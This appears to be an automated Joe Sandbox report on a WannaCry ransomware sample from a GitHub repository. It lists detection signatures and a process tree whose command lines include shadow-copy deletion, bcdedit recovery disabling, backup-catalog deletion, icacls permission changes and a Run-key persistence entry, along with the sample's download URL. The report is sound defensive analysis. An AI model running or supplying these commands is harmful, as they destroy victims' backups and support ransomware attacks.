Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip

Overview

General Information

Sample URL:https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
Analysis ID:1414487
Infos:

Detection

Conti, Wannacry
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Add file from suspicious location to autostart registry
Sigma detected: Delete shadow copy via WMIC
Yara detected Conti ransomware
Yara detected Wannacry ransomware
Blob-based file download detected
Command shell drops VBS files
Creates files in the recycle bin to hide itself
Deletes shadow drive data (may be related to ransomware)
Downloads suspicious files via Chrome
Drops PE files to the document folder of the user
Drops password protected ZIP file
Found Tor onion address
Installs TOR (Internet Anonymizer)
May use the Tor software to hide its network traffic
Modifies existing user documents (likely ransomware behavior)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Tries to harvest and steal browser information (history, passwords, etc)
Uses bcdedit to modify the Windows boot settings
Uses cmd line tools excessively to alter registry or file data
Writes many files with high entropy
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTML page contains hidden URLs or javascript code
HTTP GET or POST without a user agent
Installs a Chrome extension
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: File Download From Browser Process Via Inline URL
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Too many similar processes found
Tries to load missing DLLs
Uses cacls to modify the permissions of files
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6256 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6264 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1968,i,18163136596310937086,2943385894762523011,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • rundll32.exe (PID: 3928 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe (PID: 7412 cmdline: "C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe" MD5: 84C82835A5D21BBCF75A61706D8AB549)
    • attrib.exe (PID: 7436 cmdline: attrib +h . MD5: 0E938DD280E83B1596EC6AA48729C2B0)
      • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • icacls.exe (PID: 7444 cmdline: icacls . /grant Everyone:F /T /C /Q MD5: 2E49585E4E08565F52090B144062F97E)
      • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskdl.exe (PID: 7572 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 7596 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • cmd.exe (PID: 7620 cmdline: C:\Windows\system32\cmd.exe /c 58191711205328.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cscript.exe (PID: 7676 cmdline: cscript.exe //nologo m.vbs MD5: CB601B41D4C8074BE8A84AED564A94DC)
    • taskdl.exe (PID: 7704 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 7736 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 7756 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 7780 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 7800 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 7820 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 7840 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • dllhost.exe (PID: 7856 cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
    • taskdl.exe (PID: 7900 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 7944 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 7964 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 7984 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 8004 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 8024 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 8040 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 8064 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 8084 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 8104 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 8128 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 8156 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 8172 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 8188 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 1288 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 4100 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 1764 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5712 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 2212 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 3312 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5228 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6456 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 1776 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6552 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 552 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 7372 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 2184 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6176 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6904 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 6184 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 7368 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 640 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 2036 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 1176 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 5288 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 1144 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 4004 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 3960 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 3840 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 2424 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 1956 cmdline: @WanaDecryptor@.exe co MD5: 7BF2B57F2A205768755C07F238FB32CC)
      • taskhsvc.exe (PID: 3340 cmdline: TaskData\Tor\taskhsvc.exe MD5: FE7EB54691AD6E6AF77F8A9A0B6DE26D)
        • conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1868 cmdline: cmd.exe /c start /b @WanaDecryptor@.exe vs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • @WanaDecryptor@.exe (PID: 2576 cmdline: @WanaDecryptor@.exe vs MD5: 7BF2B57F2A205768755C07F238FB32CC)
        • cmd.exe (PID: 4428 cmdline: "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 7724 cmdline: wmic shadowcopy delete MD5: E2DE6500DE1148C7F6027AD50AC8B891)
    • taskdl.exe (PID: 3632 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 2272 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • cmd.exe (PID: 3408 cmdline: cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "whprujwpxi808" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 3636 cmdline: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "whprujwpxi808" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • taskdl.exe (PID: 3644 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • taskdl.exe (PID: 3560 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3568 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • consent.exe (PID: 7456 cmdline: consent.exe 5728 686 000001FA36427DE0 MD5: DD5032EF160209E470E2612A8A3D5F59)
      • svchost.exe (PID: 5728 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • @WanaDecryptor@.exe (PID: 7464 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 7452 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 3956 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 7528 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4136 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 4372 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 7588 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4712 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 7708 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 7732 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 7680 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 7672 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 7660 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 7772 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 7792 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 7800 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4516 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 4124 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 4016 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 1976 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 7828 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • VSSVC.exe (PID: 7896 cmdline: C:\Windows\system32\vssvc.exe MD5: 875046AD4755396636A68F4A9EDB22A4)
    • @WanaDecryptor@.exe (PID: 7924 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 7956 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 7964 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 8056 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 8080 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 8100 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 8120 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 7340 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 8128 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 8168 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 8172 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 7196 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 3948 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6520 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3496 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 2216 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 5916 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 7324 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 7344 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 1788 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 7332 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 5084 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2864 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 5772 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 3056 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2840 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 7556 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 7380 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 6648 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 4216 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 5388 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 640 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 2036 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 1108 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4008 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 4248 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 3612 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4004 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3960 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 3840 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 3604 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3044 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 1908 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 2132 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 4680 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 2064 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 3408 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3644 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 3712 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 3560 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 7500 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 7532 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 4284 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 7460 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4608 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 7444 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 7456 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4372 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 6140 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 7588 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 7736 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 7684 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 6208 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 5768 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 2576 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 7676 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 7664 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 7760 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 7768 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 7804 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 3344 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 5128 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 1500 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 4124 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 4780 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 7832 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 7848 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 7960 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 7928 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 8000 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 7956 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 5140 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 680 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 7696 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 3616 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 8048 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 2924 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 7600 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 7612 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 8100 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 7628 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 3868 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 6480 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 8164 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 8172 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 5508 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 408 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 1360 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • taskdl.exe (PID: 1764 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
    • @WanaDecryptor@.exe (PID: 816 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
    • @WanaDecryptor@.exe (PID: 7328 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
